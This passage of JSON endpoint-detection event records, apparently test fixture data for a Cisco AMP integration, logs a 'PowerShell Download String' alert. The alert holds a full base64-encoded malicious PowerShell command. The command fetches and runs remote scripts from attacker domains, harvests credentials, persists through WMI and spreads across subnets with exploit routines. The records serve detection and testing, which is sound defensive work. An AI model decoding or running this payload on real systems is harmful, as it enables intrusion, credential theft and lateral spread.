System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwA